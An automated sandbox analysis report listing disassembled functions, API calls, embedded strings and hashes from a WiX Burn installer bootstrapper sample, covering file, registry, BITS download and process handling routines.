                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,00899063,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 008B8510
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareHeapString$AllocateProcess
                                                            • String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                            • API String ID: 2664528157-4206478990
                                                            • Opcode ID: 97bf1cc955e67af5215f58a55fc8b8b33d46e387633f8dafe1471f5b18000cd5
                                                            • Instruction ID: 4be195c4c9962d4ab3ce20b3d05fb0e65b47b5075bc12dbb8c6b79908c42d5a3
                                                            • Opcode Fuzzy Hash: 97bf1cc955e67af5215f58a55fc8b8b33d46e387633f8dafe1471f5b18000cd5
                                                            • Instruction Fuzzy Hash: 2A519E71644605EBDB209F18CC85F9A7BA9FB11720F208218FA69EB3D1DBB0E940CB51
                                                            Function 008B64B7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 008B6513
                                                            • DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 008B660A
                                                            • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 008B6619
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseDeleteErrorFileHandleLast
                                                            • String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
                                                            • API String ID: 3522763407-1704223933
                                                            • Opcode ID: b4078712b1039f42efb74f5c0fce0367d251c666d3c7bd3a9dc860fa16e4b184
                                                            • Instruction ID: ebc6a4ba461d6b8b4ab013731f231635f72f55d8ee53e1ab5f91d76b5ce00c7e
                                                            • Opcode Fuzzy Hash: b4078712b1039f42efb74f5c0fce0367d251c666d3c7bd3a9dc860fa16e4b184
                                                            • Instruction Fuzzy Hash: 53510972D00119BBDF11DFA48C45AEFBBB9FF08710F144166FA14E6250E7359A219BA1
                                                            Function 00879EC7 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 147COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 00879EED
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 00879F12
                                                            Strings
                                                            • Failed to get component path: %d, xrefs: 00879F76
                                                            • Failed to format product code string., xrefs: 00879F1D
                                                            • Failed to set variable., xrefs: 00879FF6
                                                            • MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 0087A006
                                                            • Failed to format component id string., xrefs: 00879EF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open@16
                                                            • String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
                                                            • API String ID: 3613110473-1671347822
                                                            • Opcode ID: 119187e1753142a1db9f50b3d9245b3be74ccba462c4bb564c8d9718d1bbb638
                                                            • Instruction ID: 13ce47b7a30f3263df32b1ffd49429d32e811fd087cd8de87a3906bb5768fe05
                                                            • Opcode Fuzzy Hash: 119187e1753142a1db9f50b3d9245b3be74ccba462c4bb564c8d9718d1bbb638
                                                            • Instruction Fuzzy Hash: 1D41D432900115BACF25AAACCC86EFEB769FF04320F24C616F55DE2299DB30DA40D752
                                                            Function 0087F812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0087F942
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0087F94F
                                                            Strings
                                                            • %ls.RebootRequired, xrefs: 0087F82F
                                                            • Failed to read Resume value., xrefs: 0087F8D8
                                                            • Failed to format pending restart registry key to read., xrefs: 0087F846
                                                            • Resume, xrefs: 0087F8B6
                                                            • Failed to open registration key., xrefs: 0087F8AB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                            • API String ID: 3535843008-3890505273
                                                            • Opcode ID: 732e0b8233563b256de0ef98322d31167e92fc161aaa587a182bc9e5e23a6a90
                                                            • Instruction ID: 695253c3628afa03e363c8277c4908ae29b30f34f297b98ae0b0bd04c74d282e
                                                            • Opcode Fuzzy Hash: 732e0b8233563b256de0ef98322d31167e92fc161aaa587a182bc9e5e23a6a90
                                                            • Instruction Fuzzy Hash: 9A414871904119FBCF119FAAC880BA9BBB4FF04314F15817AEA18EB356C371EE419B81
                                                            Function 0088AA00 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
                                                            • API String ID: 0-660234312
                                                            • Opcode ID: eaf950a22ff27b554a4c3a6dd1a7e43c4a55eca560c22cf267146f57e7a894be
                                                            • Instruction ID: 44d73fbdd3bacda7a8b7cfe0bbb37f6cfc635ac27927c7878e3028c1186c24ea
                                                            • Opcode Fuzzy Hash: eaf950a22ff27b554a4c3a6dd1a7e43c4a55eca560c22cf267146f57e7a894be
                                                            • Instruction Fuzzy Hash: 5631C532940129BBDB2AAA98CC45F9EBB79FF10720F104266F920F62D0DB71DE40C791
                                                            Function 0089D8B0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 106comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoCreateInstance.OLE32(008D0C4C,00000000,00000017,008D0C5C,?,?,00000000,00000000,?,?,?,?,?,0089DEE7,00000000,00000000), ref: 0089D8E8
                                                            Strings
                                                            • Failed to create IBackgroundCopyManager., xrefs: 0089D8F4
                                                            • Failed to set progress timeout., xrefs: 0089D952
                                                            • WixBurn, xrefs: 0089D913
                                                            • Failed to create BITS job., xrefs: 0089D922
                                                            • Failed to set BITS job to foreground., xrefs: 0089D969
                                                            • Failed to set notification flags for BITS job., xrefs: 0089D93A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateInstance
                                                            • String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
                                                            • API String ID: 542301482-468763447
                                                            • Opcode ID: b93c4721847f5814ba57368513e60f7c1dc7a2ba87cf56a8c9e9659ad322eaf6
                                                            • Instruction ID: 07c6756626fc8c0603ff9321ee556eedc7eae21e07fc074f19fa66536a6d8e30
                                                            • Opcode Fuzzy Hash: b93c4721847f5814ba57368513e60f7c1dc7a2ba87cf56a8c9e9659ad322eaf6
                                                            • Instruction Fuzzy Hash: CD316131A4031AAF9B15EFA9C845E7FBBF4FF48710B14466AE901EB351CA349C058B95
                                                            Function 008B5DAE Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 008B5DF8
                                                            • GetLastError.KERNEL32 ref: 008B5E05
                                                            • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 008B5E4C
                                                            • GetLastError.KERNEL32 ref: 008B5E80
                                                            • CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 008B5EB4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast$CloseCreateHandleRead
                                                            • String ID: %ls.R$dlutil.cpp
                                                            • API String ID: 3160720760-657863730
                                                            • Opcode ID: 73419ca3ad906eb4ebe8aa135e23b08fd34cf5d9a52ac76ece8776dca8331496
                                                            • Instruction ID: 7188ef976d0e815c2a559a6212cba44eb3d3b56e37a0301736ddd32837f71997
                                                            • Opcode Fuzzy Hash: 73419ca3ad906eb4ebe8aa135e23b08fd34cf5d9a52ac76ece8776dca8331496
                                                            • Instruction Fuzzy Hash: 7F31B672D41A25ABDB218B98CC85BAE7BA4FF05721F114255FE15EB3C0E7B0DE0096E1
                                                            Function 0087C8E6 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0087CD5E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,0087E444,000000FF,00000000,00000000,0087E444,?,?,0087DBEB,?,?,?,?), ref: 0087CD89
                                                            • CreateFileW.KERNEL32(E9008BBA,80000000,00000005,00000000,00000003,08000000,00000000,008753C5,?,00000000,840F01E8,14680A79,00000001,008753BD,00000000,00875489), ref: 0087C956
                                                            • GetLastError.KERNEL32(?,?,?,00887809,0087566D,00875479,00875479,00000000,?,00875489,FFF9E89D,00875489,008754BD,00875445,?,00875445), ref: 0087C99B
                                                            Strings
                                                            • Failed to open catalog in working path: %ls, xrefs: 0087C9C9
                                                            • Failed to find payload for catalog file., xrefs: 0087C9E0
                                                            • Failed to verify catalog signature: %ls, xrefs: 0087C994
                                                            • catalog.cpp, xrefs: 0087C9BC
                                                            • Failed to get catalog local file path, xrefs: 0087C9D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareCreateErrorFileLastString
                                                            • String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
                                                            • API String ID: 1774366664-48089280
                                                            • Opcode ID: f8fac794945d420f34cf10249ddd2ad64281b50699d6d07e58fa4791929e9dde
                                                            • Instruction ID: 18027b5983e363d805556f9ab48e0ebc71a10fb2d8c1adac81eb83351bcbfeec
                                                            • Opcode Fuzzy Hash: f8fac794945d420f34cf10249ddd2ad64281b50699d6d07e58fa4791929e9dde
                                                            • Instruction Fuzzy Hash: C631C432940626BFC7219F58CC42B99BFA4FF04720F11C22ABA18EB355E670ED509BD1
                                                            Function 0089D33E Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,0089D642,?), ref: 0089D357
                                                            • ReleaseMutex.KERNEL32(?,?,?,?,0089D642,?), ref: 0089D375
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0089D3B6
                                                            • ReleaseMutex.KERNEL32(?), ref: 0089D3CD
                                                            • SetEvent.KERNEL32(?), ref: 0089D3D6
                                                            Strings
                                                            • Failed to get message from netfx chainer., xrefs: 0089D3F7
                                                            • Failed to send files in use message from netfx chainer., xrefs: 0089D41C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: MutexObjectReleaseSingleWait$Event
                                                            • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
                                                            • API String ID: 2608678126-3424578679
                                                            • Opcode ID: ea79a857d8f5aef248af7adb14a8bd40f3414fe41f1e4ba85dad0587aa3f27c7
                                                            • Instruction ID: c12da6e7fa0d7a495a8d8c20c7b9b4f30c296c7a4522310ace4776ce8430c001
                                                            • Opcode Fuzzy Hash: ea79a857d8f5aef248af7adb14a8bd40f3414fe41f1e4ba85dad0587aa3f27c7
                                                            • Instruction Fuzzy Hash: 5D31C631900719AFCF129F98DC08EAEBBF4FF44320F148255F965E2260C77099109B95
                                                            Function 008B093B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 008B09AB
                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 008B09B5
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 008B09FE
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 008B0A0B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$CreateErrorLastProcess
                                                            • String ID: "%ls" %ls$D$procutil.cpp
                                                            • API String ID: 161867955-2732225242
                                                            • Opcode ID: 681aee52e670f7ae62adb260f47f7423223936625b516aa5d96205ec20e453cf
                                                            • Instruction ID: 14d98d092119918960a8b475f88663c171b5252a5c682df622f30cb36200bedc
                                                            • Opcode Fuzzy Hash: 681aee52e670f7ae62adb260f47f7423223936625b516aa5d96205ec20e453cf
                                                            • Instruction Fuzzy Hash: 70212B72D0121EABDB11DFD9C941AEFBBB8FF04750F100525EA14F6311E7709E549AA2
                                                            Function 00879B9A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 00879BB3
                                                            • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,0087A8AB,00000100,000002C0,000002C0,00000100), ref: 00879BD3
                                                            • GetLastError.KERNEL32(?,0087A8AB,00000100,000002C0,000002C0,00000100), ref: 00879BDE
                                                            Strings
                                                            • Failed to format variable string., xrefs: 00879BBE
                                                            • Failed to set directory search path variable., xrefs: 00879C0F
                                                            • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00879C4A
                                                            • Failed while searching directory search: %ls, for path: %ls, xrefs: 00879C34
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AttributesErrorFileLastOpen@16
                                                            • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
                                                            • API String ID: 1811509786-2966038646
                                                            • Opcode ID: 154c73b73948d417b2913b560d73861f9392e0031dcc7503af109065ceb1c428
                                                            • Instruction ID: f100b0a471008bb8edbbfed18574450da7303f8624dd3de4e0069eeb3854fc88
                                                            • Opcode Fuzzy Hash: 154c73b73948d417b2913b560d73861f9392e0031dcc7503af109065ceb1c428
                                                            • Instruction Fuzzy Hash: 2221DA32D40025FBCF1356988D06B9DBBA9FF10360F208211F958F62559765DE50AAC9
                                                            Function 00879D4B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 00879D64
                                                            • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,0087A883,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 00879D84
                                                            • GetLastError.KERNEL32(?,0087A883,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00879D8F
                                                            Strings
                                                            • Failed to set variable to file search path., xrefs: 00879DE7
                                                            • Failed to format variable string., xrefs: 00879D6F
                                                            • Failed while searching file search: %ls, for path: %ls, xrefs: 00879DBD
                                                            • File search: %ls, did not find path: %ls, xrefs: 00879DF3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AttributesErrorFileLastOpen@16
                                                            • String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
                                                            • API String ID: 1811509786-3425311760
                                                            • Opcode ID: de0785744f0a30b710cc4be0136a162475e4972feddf47e4c4c63f74154c11cd
                                                            • Instruction ID: a129f2972d60a45f028d111f0bc9d1797081c098192e050fd213d99adf1f6fa9
                                                            • Opcode Fuzzy Hash: de0785744f0a30b710cc4be0136a162475e4972feddf47e4c4c63f74154c11cd
                                                            • Instruction Fuzzy Hash: DB11F333840525BBDB22669CCD06ADEBB25FF00720F208251F968F6261E762DE10A6D1
                                                            Function 0088CF25 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 55synchronizationthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,0088D365,00000000,?,?,0088C7C9,00000001,?,?,?,?,?), ref: 0088CF37
                                                            • GetLastError.KERNEL32(?,?,0088D365,00000000,?,?,0088C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0088CF41
                                                            • GetExitCodeThread.KERNEL32(00000001,?,?,?,0088D365,00000000,?,?,0088C7C9,00000001,?,?,?,?,?,00000000), ref: 0088CF7D
                                                            • GetLastError.KERNEL32(?,?,0088D365,00000000,?,?,0088C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0088CF87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                            • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
                                                            • API String ID: 3686190907-1954264426
                                                            • Opcode ID: 3b9dcdb7525a2e2d20a283dbf66572cb46bd68c993534c20d65eaf8cdb3d20d9
                                                            • Instruction ID: 76e5952692994cdc8f9c5986b514cbcc7d0d1aebe1ad44fa9ca87d216e7db0f4
                                                            • Opcode Fuzzy Hash: 3b9dcdb7525a2e2d20a283dbf66572cb46bd68c993534c20d65eaf8cdb3d20d9
                                                            • Instruction Fuzzy Hash: 50012633A81A3567A72067854C05A5F7A59FF00B61B014225BF14FA280EBB4CC0086F5
                                                            Function 008869AE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54synchronizationthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,00886EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 008869BB
                                                            • GetLastError.KERNEL32(?,00886EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 008869C5
                                                            • GetExitCodeThread.KERNEL32(00000001,00000000,?,00886EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 00886A04
                                                            • GetLastError.KERNEL32(?,00886EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 00886A0E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                            • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                            • API String ID: 3686190907-2546940223
                                                            • Opcode ID: 743e40dd574b6bf0a5db6705767e254f0482e192941a80c17cc7a8c5071a5927
                                                            • Instruction ID: 8f4231c231423aa741b0aa367efdcb40c429100d7373ad76417b5700c055ba37
                                                            • Opcode Fuzzy Hash: 743e40dd574b6bf0a5db6705767e254f0482e192941a80c17cc7a8c5071a5927
                                                            • Instruction Fuzzy Hash: 65115270680216BBDB10AFA59D02F7E7AA8FF00711F104179B914E9290FB75CA609765
                                                            Function 0088F7D9 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0088F7EE
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0088F8FB
                                                            Strings
                                                            • Failed to set source path for payload., xrefs: 0088F88A
                                                            • Engine is active, cannot change engine state., xrefs: 0088F808
                                                            • Failed to set source path for container., xrefs: 0088F8E0
                                                            • UX denied while trying to set source on embedded payload: %ls, xrefs: 0088F870
                                                            • UX requested unknown container with id: %ls, xrefs: 0088F8BA
                                                            • UX requested unknown payload with id: %ls, xrefs: 0088F85A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
